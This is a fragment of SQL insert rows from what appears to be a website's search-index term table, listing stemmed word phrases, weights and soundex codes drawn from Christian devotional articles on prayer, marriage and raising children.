(198225, 'sow your seeds', 'sow your seeds', 0, 1, 1.4667, 'S6232', 1, '*'),
(198226, 'spirit to your', 'spirit to your', 0, 1, 1.4667, 'S1636', 1, '*'),
(198227, 'spoken concerning', 'spoken concerning', 0, 1, 1.5667, 'S125252652', 1, '*'),
(198228, 'spoken concerning him', 'spoken concerning him', 0, 1, 1.7, 'S1252526525', 1, '*'),
(198229, 'step 4 psalm', 'step 4 psalm', 0, 1, 1.4, 'S31245', 1, '*'),
(198230, 'steps unto', 'step unto', 0, 1, 1.3333, 'S31253', 1, '*'),
(198231, 'steps unto the', 'step unto the', 0, 1, 1.4667, 'S31253', 1, '*'),
(198232, 'stop all', 'stop all', 0, 1, 1.2667, 'S314', 1, '*'),
(198233, 'stop all malice', 'stop all malice', 0, 1, 1.5, 'S314542', 1, '*'),
(198234, 'stop comparing', 'stop comparing', 0, 1, 1.4667, 'S31251652', 1, '*'),
(198235, 'stop comparing him', 'stop comparing him', 0, 1, 1.6, 'S312516525', 1, '*'),
(198236, 'stop comparing yourself', 'stop comparing yourself', 0, 1, 1.7667, 'S312516526241', 1, '*'),
(198237, 'stop competing', 'stop competing', 0, 1, 1.4667, 'S31251352', 1, '*'),
(198238, 'stop competing against', 'stop competing against', 0, 1, 1.7333, 'S31251352523', 1, '*'),
(198239, 'stop complaining', 'stop complaining', 0, 1, 1.5333, 'S31251452', 1, '*'),
(198240, 'stop complaining about', 'stop complaining about', 0, 1, 1.7333, 'S3125145213', 1, '*'),
(198241, 'stop getting', 'stop getting', 0, 1, 1.4, 'S312352', 1, '*'),
(198242, 'stop getting bitter', 'stop getting bitter', 0, 1, 1.6333, 'S312352136', 1, '*'),
(198243, 'stop quarreling', 'stop quarreling', 0, 1, 1.5, 'S3126452', 1, '*'),
(198244, 'stop quarreling with', 'stop quarreling with', 0, 1, 1.6667, 'S31264523', 1, '*'),
(198245, 'stop rating', 'stop rating', 0, 1, 1.3667, 'S316352', 1, '*'),
(198246, 'stop rating him', 'stop rating him', 0, 1, 1.5, 'S3163525', 1, '*'),
(198247, 'stop stop', 'stop stop', 0, 1, 1.3, 'S31231', 1, '*'),
(198248, 'stop stop stop', 'stop stop stop', 0, 1, 1.4667, 'S31231231', 1, '*'),
(198249, 'stop yelling', 'stop yelling', 0, 1, 1.4, 'S31452', 1, '*'),
(198250, 'stop yelling at', 'stop yelling at', 0, 1, 1.5, 'S314523', 1, '*'),
(198251, 'success that', 'success that', 0, 1, 1.4, 'S300', 1, '*'),
(198252, 'success that can', 'success that can', 0, 1, 1.5333, 'S325', 1, '*'),
(198253, 'sure house', 'sure house', 0, 1, 1.3333, 'S620', 1, '*'),
(198254, 'sure house god', 'sure house god', 0, 1, 1.4667, 'S623', 1, '*'),
(198255, 'surely', 'sure', 0, 0, 0.4, 'S640', 3, '*'),
(198256, 'surely remember', 'sure remember', 0, 1, 1.5, 'S646516', 1, '*'),
(198257, 'surely remember you', 'sure remember you', 0, 1, 1.6333, 'S646516', 1, '*'),
(198258, 'sweet marital', 'sweet marital', 0, 1, 1.4333, 'S35634', 1, '*'),
(198259, 'sweet marital comfort', 'sweet marital comfort', 0, 1, 1.7, 'S3563425163', 1, '*'),
(198260, 'talk to', 'talk to', 0, 1, 1.2333, 'T423', 1, '*'),
(198261, 'talk to god', 'talk to god', 0, 1, 1.3667, 'T42323', 1, '*'),
(198262, 'talk to him', 'talk to him', 0, 1, 1.3667, 'T4235', 1, '*'),
(198263, 'talks to', 'talk to', 0, 1, 1.2667, 'T423', 1, '*'),
(198264, 'talks to your', 'talk to your', 0, 1, 1.4333, 'T4236', 1, '*'),
(198265, 'text psalm', 'text psalm', 0, 1, 1.3333, 'T231245', 1, '*'),
(198266, 'text psalm 128', 'text psalm 128', 0, 1, 1.4667, 'T231245', 1, '*'),
(198267, 'that abigail', 'that abigail', 0, 1, 1.4, 'T124', 1, '*'),
(198268, 'that abigail prayed', 'that abigail prayed', 0, 1, 1.6333, 'T124163', 1, '*'),
(198269, 'that can be', 'that can be', 0, 1, 1.3667, 'T251', 1, '*'),
(198270, 'that have success', 'that have success', 0, 1, 1.5667, 'T120', 1, '*'),
(198271, 'that he has', 'that he has', 0, 1, 1.3667, 'T200', 2, '*'),
(198272, 'that of his', 'that of his', 0, 1, 1.3667, 'T120', 1, '*'),
(198273, 'the agenda', 'the agenda', 0, 1, 1.3333, 'T253', 1, '*'),
(198274, 'the agenda of', 'the agenda of', 0, 1, 1.4333, 'T2531', 1, '*'),
(198275, 'the better', 'the better', 0, 1, 1.3333, 'T136', 1, '*'),
(198276, 'the better he', 'the better he', 0, 1, 1.4333, 'T136', 1, '*'),
(198277, 'the bible he', 'the bible he', 0, 1, 1.4, 'T140', 1, '*'),
(198278, 'the bundle', 'the bundle', 0, 1, 1.3333, 'T1534', 1, '*'),
(198279, 'the bundle of', 'the bundle of', 0, 1, 1.4333, 'T15341', 1, '*'),
(198280, 'the difference your', 'the difference your', 0, 1, 1.6333, 'T16526', 1, '*'),
(198281, 'the good and', 'the good and', 0, 1, 1.4, 'T2353', 1, '*'),
(198282, 'the good that', 'the good that', 0, 1, 1.4333, 'T230', 1, '*'),
(198283, 'the home', 'the home', 0, 1, 1.2667, 'T500', 1, '*'),
(198284, 'the home receive', 'the home receive', 0, 1, 1.5333, 'T5621', 1, '*'),
(198285, 'the labour', 'the labour', 0, 1, 1.3333, 'T416', 1, '*'),
(198286, 'the labour of', 'the labour of', 0, 1, 1.4333, 'T4161', 1, '*'),
(198287, 'the platform', 'the platform', 0, 1, 1.4, 'T143165', 1, '*'),
(198288, 'the platform of', 'the platform of', 0, 1, 1.5, 'T1431651', 1, '*'),
(198289, 'the prayers', 'the prayers', 0, 1, 1.3667, 'T162', 1, '*'),
(198290, 'the prayers that', 'the prayers that', 0, 1, 1.5333, 'T1623', 1, '*'),
(198291, 'to appoint', 'to appoint', 0, 1, 1.3333, 'T153', 1, '*'),
(198292, 'to appoint him', 'to appoint him', 0, 1, 1.4667, 'T1535', 1, '*'),
(198293, 'to bind', 'to bind', 0, 1, 1.2333, 'T153', 1, '*'),
(198294, 'to bind his', 'to bind his', 0, 1, 1.3667, 'T1532', 1, '*'),
(198295, 'to do for', 'to do for', 0, 1, 1.3, 'T160', 1, '*'),
(198296, 'to do pray', 'to do pray', 0, 1, 1.3333, 'T160', 1, '*'),
(198297, 'to fight his', 'to fight his', 0, 1, 1.4, 'T1232', 1, '*'),
(198298, 'to god and', 'to god and', 0, 1, 1.3333, 'T2353', 1, '*'),
(198299, 'to him below', 'to him below', 0, 1, 1.4, 'T514', 1, '*'),
(198300, 'to him lord', 'to him lord', 0, 1, 1.3667, 'T5463', 1, '*'),
(198301, 'to him when', 'to him when', 0, 1, 1.3667, 'T500', 2, '*'),
(198302, 'to him-don\'t', 'to him-don', 0, 1, 1.4, 'T5353', 1, '*'),
(198303, 'to him-don\'t hide', 'to him-don hide', 0, 1, 1.5667, 'T5353', 1, '*'),
(198304, 'to make him', 'to make him', 0, 1, 1.3667, 'T525', 1, '*'),
(198305, 'to move', 'to move', 0, 1, 1.2333, 'T510', 2, '*'),
(198306, 'to move away', 'to move away', 0, 1, 1.4, 'T510', 1, '*'),
(198307, 'to reveal', 'to reveal', 0, 1, 1.3, 'T614', 1, '*'),
(198308, 'to reveal yourself', 'to reveal yourself', 0, 1, 1.6, 'T6146241', 1, '*'),
(198309, 'to the home', 'to the home', 0, 1, 1.3667, 'T500', 1, '*'),
(198310, 'to your husband', 'to your husband', 0, 1, 1.5, 'T62153', 1, '*'),
(198311, 'to your revelations', 'to your revelations', 0, 1, 1.6333, 'T614352', 1, '*'),
(198312, 'today 2', 'todai 2', 0, 1, 1.2333, 'T000', 1, '*'),
(198313, 'today 2 psalm', 'todai 2 psalm', 0, 1, 1.4333, 'T1245', 1, '*'),
(198314, 'under a', 'under a', 0, 1, 1.2333, 'U536', 1, '*'),
(198315, 'under a god-ordained', 'under a god-ordained', 0, 1, 1.6667, 'U536236353', 1, '*'),
(198316, 'unto the platform', 'unto the platform', 0, 1, 1.5667, 'U53143165', 1, '*'),
(198317, 'up and down', 'up and down', 0, 1, 1.3667, 'U1535', 1, '*'),
(198318, 'use your weapon', 'us your weapon', 0, 1, 1.5, 'U2615', 1, '*'),
(198319, 'victory sow', 'victori sow', 0, 1, 1.3667, 'V2362', 1, '*'),
(198320, 'victory sow your', 'victori sow your', 0, 1, 1.5333, 'V23626', 1, '*'),
(198321, 'vine for', 'vine for', 0, 1, 1.2667, 'V516', 1, '*'),
(198322, 'vine for him', 'vine for him', 0, 1, 1.4, 'V5165', 1, '*'),
(198323, 'walk in harvests', 'walk in harvests', 0, 1, 1.5333, 'W42561232', 1, '*'),
(198324, 'weakness', 'weak', 0, 0, 0.5333, 'W252', 2, '*'),
(198325, 'weakness and', 'weak and', 0, 1, 1.4, 'W25253', 1, '*'),
(198326, 'weakness and failure', 'weak and failure', 0, 1, 1.6667, 'W25253146', 1, '*'),
(198327, 'weapon', 'weapon', 0, 0, 0.4, 'W150', 1, '*'),
(198328, 'weapon of', 'weapon of', 0, 1, 1.3, 'W151', 1, '*'),
(198329, 'weapon of intercession', 'weapon of intercession', 0, 1, 1.7333, 'W15153625', 1, '*'),
(198330, 'well and', 'well and', 0, 1, 1.2667, 'W453', 1, '*'),
(198331, 'well and bringing', 'well and bringing', 0, 1, 1.5667, 'W453165252', 1, '*'),
(198332, 'well with him', 'well with him', 0, 1, 1.4333, 'W435', 1, '*'),
(198333, 'what are you', 'what are you', 0, 1, 1.4, 'W360', 1, '*'),
(198334, 'when god talks', 'when god talks', 0, 1, 1.4667, 'W52342', 1, '*'),
(198335, 'when you talk', 'when you talk', 0, 1, 1.4333, 'W5342', 1, '*'),
(198336, 'will be fulfilled', 'will be fulfilled', 0, 1, 1.5667, 'W414143', 1, '*'),
(198337, 'will be well', 'will be well', 0, 1, 1.4, 'W414', 1, '*'),
(198338, 'will eat', 'will eat', 0, 1, 1.2667, 'W430', 2, '*'),
(198339, 'will eat the', 'will eat the', 0, 1, 1.4, 'W430', 1, '*'),
(198340, 'will move him', 'will move him', 0, 1, 1.4333, 'W4515', 1, '*'),
(198341, 'will see his', 'will see his', 0, 1, 1.4, 'W420', 1, '*'),
(198342, 'will surely', 'will surely', 0, 1, 1.3667, 'W4264', 2, '*'),
(198343, 'will surely remember', 'will surely remember', 0, 1, 1.6667, 'W42646516', 1, '*'),
(198344, 'will talk', 'will talk', 0, 1, 1.3, 'W4342', 1, '*'),
(198345, 'will talk to', 'will talk to', 0, 1, 1.4, 'W43423', 1, '*'),
(198346, 'with him stop', 'with him stop', 0, 1, 1.4333, 'W35231', 1, '*'),
(198347, 'with others', 'with others', 0, 1, 1.3667, 'W362', 1, '*'),
(198348, 'with others that', 'with others that', 0, 1, 1.5333, 'W3623', 1, '*'),
(198349, 'won\'t rest', 'won rest', 0, 1, 1.3333, 'W53623', 1, '*'),
(198350, 'won\'t rest on', 'won rest on', 0, 1, 1.4333, 'W536235', 1, '*'),
(198351, 'work at home', 'work at home', 0, 1, 1.4, 'W6235', 1, '*'),
(198352, 'work on him', 'work on him', 0, 1, 1.3667, 'W625', 1, '*'),
(198353, 'yelling', 'yell', 0, 0, 0.4667, 'Y452', 1, '*'),
(198354, 'yelling at', 'yell at', 0, 1, 1.3333, 'Y4523', 1, '*'),
(198355, 'yelling at him', 'yell at him', 0, 1, 1.4667, 'Y45235', 1, '*'),
(198356, 'you as he', 'you as he', 0, 1, 1.3, 'Y200', 1, '*'),
(198357, 'you did for', 'you did for', 0, 1, 1.3667, 'Y316', 1, '*'),
(198358, 'you prayer', 'you prayer', 0, 1, 1.3333, 'Y160', 1, '*'),
(198359, 'you prayer for', 'you prayer for', 0, 1, 1.4667, 'Y1616', 1, '*'),
(198360, 'you talk', 'you talk', 0, 1, 1.2667, 'Y342', 1, '*'),
(198361, 'you talk to', 'you talk to', 0, 1, 1.3667, 'Y3423', 1, '*'),
(198362, 'your children as', 'your children as', 0, 1, 1.5333, 'Y6243652', 2, '*'),
(198363, 'your husband', 'your husband', 0, 1, 1.4, 'Y62153', 1, '*'),
(198364, 'your husband 1', 'your husband 1', 0, 1, 1.4667, 'Y62153', 1, '*'),
(198365, 'your husband stop', 'your husband stop', 0, 1, 1.5667, 'Y62153231', 1, '*'),
(198366, 'your husband there', 'your husband there', 0, 1, 1.6, 'Y621536', 1, '*'),
(198367, 'your plan', 'your plan', 0, 1, 1.3, 'Y6145', 1, '*'),
(198368, 'your plan from', 'your plan from', 0, 1, 1.4667, 'Y6145165', 1, '*'),
(198369, 'your prayer of', 'your prayer of', 0, 1, 1.4667, 'Y6161', 1, '*'),
(198370, 'your prayers', 'your prayers', 0, 1, 1.4, 'Y6162', 1, '*'),
(198371, 'your prayers can', 'your prayers can', 0, 1, 1.5333, 'Y61625', 1, '*'),
(198372, 'your revelations', 'your revelations', 0, 1, 1.5333, 'Y614352', 1, '*'),
(198373, 'your revelations directions', 'your revelations directions', 0, 1, 1.9, 'Y614352362352', 1, '*'),
(198374, 'your seeds', 'your seeds', 0, 1, 1.3333, 'Y6232', 1, '*'),
(198375, 'your seeds of', 'your seeds of', 0, 1, 1.4333, 'Y62321', 1, '*'),
(198376, 'your weapon', 'your weapon', 0, 1, 1.3667, 'Y615', 1, '*'),
(198377, 'your weapon of', 'your weapon of', 0, 1, 1.4667, 'Y6151', 1, '*'),
(198378, 'yourself to him-don\'t', 'yourself to him-don', 0, 1, 1.7, 'Y624135353', 1, '*'),
(198379, 'yourself with him', 'yourself with him', 0, 1, 1.5667, 'Y624135', 1, '*'),
(198380, 'zion he', 'zion he', 0, 1, 1.2333, 'Z500', 1, '*'),
(198381, 'zion he will', 'zion he will', 0, 1, 1.4, 'Z540', 1, '*'),
(200810, 'children and', 'children and', 0, 1, 1.4, 'C43653', 4, '*'),
(200855, 'christ that', 'christ that', 0, 1, 1.3667, 'C623', 2, '*'),
(200863, 'conception', 'concept', 0, 0, 0.6667, 'C52135', 3, '*'),
(200884, 'declare that', 'declar that', 0, 1, 1.4, 'D2463', 2, '*'),
(200886, 'delay', 'delai', 0, 0, 0.3333, 'D400', 2, '*'),
(200889, 'delivery', 'deliveri', 0, 0, 0.5333, 'D416', 2, '*'),
(201064, 'have good', 'have good', 0, 1, 1.3, 'H123', 2, '*'),
(201087, 'his wife', 'hi wife', 0, 1, 1.2667, 'H210', 2, '*'),
(201143, 'is the lord', 'is the lord', 0, 1, 1.3667, 'I23463', 2, '*'),
(201236, 'mother', 'mother', 0, 0, 0.4, 'M360', 4, '*'),
(201305, 'other children', 'other children', 0, 1, 1.4667, 'O3624365', 2, '*'),
(201663, 'was a', 'wa a', 0, 1, 1.1667, 'W200', 6, '*'),
(201672, 'what is right', 'what is right', 0, 1, 1.4333, 'W32623', 2, '*'),
(210942, '44', '44', 0, 0, 0.2, '', 3, '*'),
(211002, 'accomplished', 'accomplish', 0, 0, 0.8, 'A251423', 2, '*'),
(212308, 'period', 'period', 0, 0, 0.4, 'P630', 2, '*'),
(214886, '1 samuel 2', '1 samuel 2', 0, 1, 1.3333, 'S540', 2, '*'),
(214887, '1-16', '1-16', 0, 0, 0.4, '', 1, '*'),
(214888, '1-16 there', '1-16 there', 0, 1, 1.3333, 'T600', 1, '*'),
(214889, '1-16 there are', '1-16 there are', 0, 1, 1.4667, 'T600', 1, '*'),
(214890, '11 91', '11 91', 0, 1, 1.1667, '', 1, '*'),
(214891, '11 91 1-16', '11 91 1-16', 0, 1, 1.3333, '', 1, '*'),
(214892, '11 ps', '11 ps', 0, 1, 1.1667, 'P200', 1, '*'),
(214893, '11 ps 91', '11 ps 91', 0, 1, 1.2667, 'P200', 1, '*'),
(214894, '12 over', '12 over', 0, 1, 1.2333, 'O160', 1, '*'),
(214895, '12 over your', '12 over your', 0, 1, 1.4, 'O160', 1, '*'),
(214896, '13 7-14', '13 7-14', 0, 1, 1.2333, '', 1, '*'),
(214897, '13 7-14 genesis', '13 7-14 genesis', 0, 1, 1.5, 'G520', 1, '*'),
(214898, '13 7-14 pray', '13 7-14 pray', 0, 1, 1.4, 'P600', 1, '*'),
(214899, '2 22', '2 22', 0, 1, 1.1333, '', 1, '*'),
(214900, '2 22 genesis', '2 22 genesis', 0, 1, 1.4, 'G520', 1, '*'),
(214901, '2 22 pray', '2 22 pray', 0, 1, 1.3, 'P600', 1, '*'),
(214902, '20 can', '20 can', 0, 1, 1.2, 'C500', 1, '*'),
(214903, '20 can bring', '20 can bring', 0, 1, 1.4, 'C51652', 1, '*'),
(214904, '21 psalms', '21 psalms', 0, 1, 1.3, 'P2452', 1, '*'),
(214905, '21 psalms 46', '21 psalms 46', 0, 1, 1.4, 'P2452', 1, '*'),
(214906, '22 genesis', '22 genesis', 0, 1, 1.3333, 'G520', 1, '*'),
(214907, '22 genesis 13', '22 genesis 13', 0, 1, 1.4333, 'G520', 1, '*'),
(214908, '22 pray', '22 pray', 0, 1, 1.2333, 'P600', 1, '*'),
(214909, '22 pray for', '22 pray for', 0, 1, 1.3667, 'P616', 1, '*'),
(214910, '26 you', '26 you', 0, 1, 1.2, 'Y000', 1, '*'),
(214911, '26 you must', '26 you must', 0, 1, 1.3667, 'Y523', 1, '*'),
(214912, '35 seven', '35 seven', 0, 1, 1.2667, 'S150', 1, '*'),
(214913, '35 seven scriptural', '35 seven scriptural', 0, 1, 1.6333, 'S15261364', 1, '*'),
(214914, '39 21', '39 21', 0, 1, 1.1667, '', 1, '*'),
(214915, '39 21 psalms', '39 21 psalms', 0, 1, 1.4, 'P2452', 1, '*'),
(214916, '46', '46', 0, 0, 0.2, '', 2, '*'),
(214917, '46 7', '46 7', 0, 1, 1.1333, '', 1, '*'),
(214918, '46 7 11', '46 7 11', 0, 1, 1.2333, '', 1, '*'),
(214919, '49', '49', 0, 0, 0.2, '', 3, '*'),
(214920, '49 26', '49 26', 0, 1, 1.1667, '', 2, '*'),
(214921, '49 26 you', '49 26 you', 0, 1, 1.3, 'Y000', 1, '*'),
(214922, '5 12', '5 12', 0, 1, 1.1333, '', 1, '*'),
(214923, '5 12 over', '5 12 over', 0, 1, 1.3, 'O160', 1, '*'),
(214924, '7 11', '7 11', 0, 1, 1.1333, '', 1, '*'),
(214925, '7 11 91', '7 11 91', 0, 1, 1.2333, '', 1, '*'),
(214926, '7 11 ps', '7 11 ps', 0, 1, 1.2333, 'P200', 1, '*'),
(214927, '7 prayer', '7 prayer', 0, 1, 1.2667, 'P600', 1, '*'),
(214928, '7 prayer points', '7 prayer points', 0, 1, 1.5, 'P61532', 1, '*'),
(214929, '7-14', '7-14', 0, 0, 0.4, '', 1, '*'),
(214930, '7-14 genesis', '7-14 genesis', 0, 1, 1.4, 'G520', 1, '*'),
(214931, '7-14 genesis 39', '7-14 genesis 39', 0, 1, 1.5, 'G520', 1, '*'),
(214932, '7-14 pray', '7-14 pray', 0, 1, 1.3, 'P600', 1, '*'),
(214933, '7-14 pray that', '7-14 pray that', 0, 1, 1.4667, 'P630', 1, '*'),
(214934, '91', '91', 0, 0, 0.2, '', 1, '*'),
(214935, '91 1-16', '91 1-16', 0, 1, 1.2333, '', 1, '*'),
(214936, '91 1-16 there', '91 1-16 there', 0, 1, 1.4333, 'T600', 1, '*'),
(214937, '91 and', '91 and', 0, 1, 1.2, 'A530', 1, '*'),
(214938, '91 and ps', '91 and ps', 0, 1, 1.3, 'A5312', 1, '*'),
(214939, '91 there', '91 there', 0, 1, 1.2667, 'T600', 1, '*'),
(214940, '91 there is', '91 there is', 0, 1, 1.3667, 'T620', 1, '*'),
(214941, 'a bit', 'a bit', 0, 1, 1.1667, 'A130', 1, '*'),
(214942, 'a bit late', 'a bit late', 0, 1, 1.3333, 'A1343', 1, '*'),
(214943, 'a great spiritual', 'a great spiritual', 0, 1, 1.5667, 'A26321634', 1, '*'),
(214944, 'a nursing', 'a nursing', 0, 1, 1.3, 'A56252', 1, '*'),
(214945, 'a nursing mother', 'a nursing mother', 0, 1, 1.5333, 'A56252536', 1, '*'),
(214946, 'a saying', 'a saying', 0, 1, 1.2667, 'A252', 1, '*'),
(214947, 'a saying in', 'a saying in', 0, 1, 1.3667, 'A2525', 1, '*'),
(214948, 'a school you', 'a school you', 0, 1, 1.4, 'A240', 1, '*'),
(214949, 'a shield of', 'a shield of', 0, 1, 1.3667, 'A2431', 1, '*'),
(214950, 'a sound', 'a sound', 0, 1, 1.2333, 'A253', 1, '*'),
(214951, 'a sound and', 'a sound and', 0, 1, 1.3667, 'A25353', 1, '*'),
(214952, 'a time where', 'a time where', 0, 1, 1.4, 'A356', 1, '*'),
(214953, 'a very important', 'a very important', 0, 1, 1.5333, 'A16516353', 1, '*'),
(214954, 'ability to judge', 'abil to judge', 0, 1, 1.5333, 'A143232', 1, '*'),
(214955, 'ability to separate', 'abil to separate', 0, 1, 1.6333, 'A1432163', 1, '*'),
(214956, 'about location', 'about location', 0, 1, 1.4667, 'A134235', 1, '*'),
(214957, 'about location career', 'about location career', 0, 1, 1.7, 'A13423526', 1, '*'),
(214958, 'activate those', 'activ those', 0, 1, 1.4667, 'A23132', 3, '*'),
(214959, 'activate those things', 'activ those things', 0, 1, 1.7, 'A23132352', 1, '*'),
(214960, 'actively pray', 'activ pray', 0, 1, 1.4333, 'A231416', 1, '*'),
(214961, 'actively pray that', 'activ pray that', 0, 1, 1.6, 'A2314163', 1, '*'),
(214962, 'against negative', 'against negative', 0, 1, 1.5333, 'A25235231', 1, '*'),
(214963, 'against negative ancestral', 'against negative ancestral', 0, 1, 1.8667, 'A2523523152364', 1, '*'),
(214964, 'agree', 'agre', 0, 0, 0.3333, 'A260', 1, '*'),
(214965, 'agree that', 'agre that', 0, 1, 1.3333, 'A263', 1, '*'),
(214966, 'agree that we', 'agre that we', 0, 1, 1.4333, 'A263', 1, '*'),
(214967, 'all grow', 'all grow', 0, 1, 1.2667, 'A426', 1, '*'),
(214968, 'all grow up', 'all grow up', 0, 1, 1.3667, 'A4261', 1, '*'),
(214969, 'all he', 'all he', 0, 1, 1.2, 'A400', 1, '*'),
(214970, 'all he had', 'all he had', 0, 1, 1.3333, 'A430', 1, '*'),
(214971, 'all it takes', 'all it takes', 0, 1, 1.4, 'A432', 1, '*'),
(214972, 'all wrong', 'all wrong', 0, 1, 1.3, 'A4652', 1, '*'),
(214973, 'all wrong relationships', 'all wrong relationships', 0, 1, 1.7667, 'A46526435212', 1, '*'),
(214974, 'all you have', 'all you have', 0, 1, 1.4, 'A410', 1, '*'),
(214975, 'all your work', 'all your work', 0, 1, 1.4333, 'A462', 1, '*'),
(214976, 'almost always understand', 'almost always understand', 0, 1, 1.8, 'A4523425362353', 1, '*'),
(214977, 'also surround', 'also surround', 0, 1, 1.4333, 'A42653', 1, '*'),
(214978, 'also surround them', 'also surround them', 0, 1, 1.6, 'A426535', 1, '*'),
(214979, 'always be', 'alwai be', 0, 1, 1.3, 'A421', 3, '*'),
(214980, 'always be a', 'alwai be a', 0, 1, 1.3667, 'A421', 1, '*'),
(214981, 'always be there', 'alwai be there', 0, 1, 1.5, 'A42136', 1, '*'),
(214982, 'always treat our', 'alwai treat our', 0, 1, 1.5333, 'A423636', 1, '*'),
(214983, 'always understand', 'alwai understand', 0, 1, 1.5667, 'A425362353', 1, '*'),
(214984, 'always understand why', 'alwai understand why', 0, 1, 1.7, 'A425362353', 1, '*'),
(214985, 'an assignment but', 'an assignment but', 0, 1, 1.5667, 'A525313', 1, '*'),
(214986, 'ancestral', 'ancestr', 0, 0, 0.6, 'A52364', 1, '*'),
(214987, 'ancestral flow', 'ancestr flow', 0, 1, 1.4667, 'A5236414', 1, '*'),
(214988, 'ancestral flow nb', 'ancestr flow nb', 0, 1, 1.5667, 'A523641451', 1, '*'),
(214989, 'ancestral flow will', 'ancestr flow will', 0, 1, 1.6333, 'A5236414', 1, '*'),
(214990, 'ancestral flows', 'ancestr flows', 0, 1, 1.5, 'A52364142', 1, '*'),
(214991, 'ancestral flows genesis', 'ancestr flows genesis', 0, 1, 1.7667, 'A5236414252', 1, '*'),
(214992, 'ancestral flows in', 'ancestr flows in', 0, 1, 1.6, 'A523641425', 1, '*'),
(214993, 'ancestral flows you', 'ancestr flows you', 0, 1, 1.6333, 'A52364142', 1, '*'),
(214994, 'and all he', 'and all he', 0, 1, 1.3333, 'A534', 1, '*'),
(214995, 'and consideration', 'and consideration', 0, 1, 1.5667, 'A532523635', 1, '*'),
(214996, 'and consideration if', 'and consideration if', 0, 1, 1.6667, 'A5325236351', 1, '*'),
(214997, 'and corrupt', 'and corrupt', 0, 1, 1.3667, 'A532613', 1, '*'),
(214998, 'and corrupt their', 'and corrupt their', 0, 1, 1.5667, 'A5326136', 1, '*'),
(214999, 'and died', 'and died', 0, 1, 1.2667, 'A530', 1, '*'),
(215000, 'and died with', 'and died with', 0, 1, 1.4333, 'A530', 1, '*'),
(215001, 'and discern', 'and discern', 0, 1, 1.3667, 'A53265', 1, '*'),
(215002, 'and discern what', 'and discern what', 0, 1, 1.5333, 'A532653', 1, '*'),
(215003, 'and ensuring', 'and ensuring', 0, 1, 1.4, 'A5352652', 1, '*'),
(215004, 'and ensuring you', 'and ensuring you', 0, 1, 1.5333, 'A5352652', 1, '*'),
(215005, 'and experiences', 'and experiences', 0, 1, 1.5, 'A5321652', 2, '*'),
(215006, 'and experiences declare', 'and experiences declare', 0, 1, 1.7667, 'A53216523246', 1, '*'),
(215007, 'and experiences of', 'and experiences of', 0, 1, 1.6, 'A53216521', 1, '*'),
(215008, 'and gomorrah', 'and gomorrah', 0, 1, 1.4, 'A53256', 1, '*'),
(215009, 'and gomorrah and', 'and gomorrah and', 0, 1, 1.5333, 'A5325653', 1, '*'),
(215010, 'and great spiritual', 'and great spiritual', 0, 1, 1.6333, 'A5326321634', 1, '*'),
(215011, 'and greet', 'and greet', 0, 1, 1.3, 'A53263', 1, '*'),
(215012, 'and greet their', 'and greet their', 0, 1, 1.5, 'A532636', 1, '*'),
(215013, 'and growing', 'and growing', 0, 1, 1.3667, 'A532652', 1, '*'),
(215014, 'and growing up', 'and growing up', 0, 1, 1.4667, 'A5326521', 1, '*'),
(215015, 'and he lost', 'and he lost', 0, 1, 1.3667, 'A53423', 1, '*'),
(215016, 'and he started', 'and he started', 0, 1, 1.4667, 'A532363', 1, '*'),
(215017, 'and if their', 'and if their', 0, 1, 1.4, 'A53136', 1, '*'),
(215018, 'and marriage', 'and marriage', 0, 1, 1.4, 'A53562', 1, '*'),
(215019, 'and marriage pray', 'and marriage pray', 0, 1, 1.5667, 'A5356216', 1, '*'),
(215020, 'and not any', 'and not any', 0, 1, 1.3667, 'A53535', 1, '*'),
(215021, 'and prevent', 'and prevent', 0, 1, 1.3667, 'A5316153', 1, '*'),
(215022, 'and prevent your', 'and prevent your', 0, 1, 1.5333, 'A53161536', 1, '*'),
(215023, 'and ps', 'and ps', 0, 1, 1.2, 'A5312', 1, '*'),
(215024, 'and that they', 'and that they', 0, 1, 1.4333, 'A530', 1, '*'),
(215025, 'and they will', 'and they will', 0, 1, 1.4333, 'A534', 1, '*'),
(215026, 'and what is', 'and what is', 0, 1, 1.3667, 'A532', 1, '*'),
(215027, 'and white', 'and white', 0, 1, 1.3, 'A530', 1, '*'),
(215028, 'and white they', 'and white they', 0, 1, 1.4667, 'A530', 1, '*'),
(215029, 'and will always', 'and will always', 0, 1, 1.5, 'A5342', 1, '*'),
(215030, 'and wrong', 'and wrong', 0, 1, 1.3, 'A53652', 1, '*'),
(215031, 'and wrong such', 'and wrong such', 0, 1, 1.4667, 'A53652', 1, '*'),
(215032, 'anointing and died', 'anoint and died', 0, 1, 1.6, 'A535253', 1, '*'),
(215033, 'any negative', 'ani negative', 0, 1, 1.4, 'A5231', 1, '*'),
(215034, 'any negative ancestral', 'ani negative ancestral', 0, 1, 1.7333, 'A523152364', 1, '*'),
(215035, 'anything to', 'anyth to', 0, 1, 1.3667, 'A53523', 1, '*'),
(215036, 'anything to activate', 'anyth to activate', 0, 1, 1.6667, 'A535232313', 1, '*'),
(215037, 'are 7', 'ar 7', 0, 1, 1.1667, 'A600', 1, '*'),
(215038, 'are 7 prayer', 'ar 7 prayer', 0, 1, 1.4, 'A616', 1, '*'),
(215039, 'are but', 'ar but', 0, 1, 1.2333, 'A613', 2, '*'),
(215040, 'are but god', 'ar but god', 0, 1, 1.3667, 'A61323', 1, '*'),
(215041, 'are confronted', 'ar confronted', 0, 1, 1.4667, 'A6251653', 1, '*'),
(215042, 'are confronted with', 'ar confronted with', 0, 1, 1.6333, 'A6251653', 1, '*'),
(215043, 'are not clearly', 'ar not clearly', 0, 1, 1.5, 'A6532464', 1, '*'),
(215044, 'are old', 'ar old', 0, 1, 1.2333, 'A643', 2, '*'),
(215045, 'are old or', 'ar old or', 0, 1, 1.3333, 'A6436', 1, '*'),
(215046, 'are people in', 'ar people in', 0, 1, 1.4333, 'A6145', 1, '*'),
(215047, 'are the arrow', 'ar the arrow', 0, 1, 1.4333, 'A636', 1, '*'),
(215048, 'are the principal', 'ar the principal', 0, 1, 1.5667, 'A63165214', 1, '*'),
(215049, 'are to become', 'ar to become', 0, 1, 1.4333, 'A63125', 1, '*'),
(215050, 'are young', 'ar young', 0, 1, 1.3, 'A652', 1, '*'),
(215051, 'are young and', 'ar young and', 0, 1, 1.4333, 'A65253', 1, '*'),
(215052, 'arrow', 'arrow', 0, 0, 0.3333, 'A600', 1, '*'),
(215053, 'arrow head', 'arrow head', 0, 1, 1.3333, 'A630', 1, '*'),
(215054, 'arrow head of', 'arrow head of', 0, 1, 1.4333, 'A631', 1, '*'),
(215055, 'as their', 'as their', 0, 1, 1.2667, 'A236', 1, '*'),
(215056, 'as their parents', 'as their parents', 0, 1, 1.5333, 'A23616532', 1, '*'),
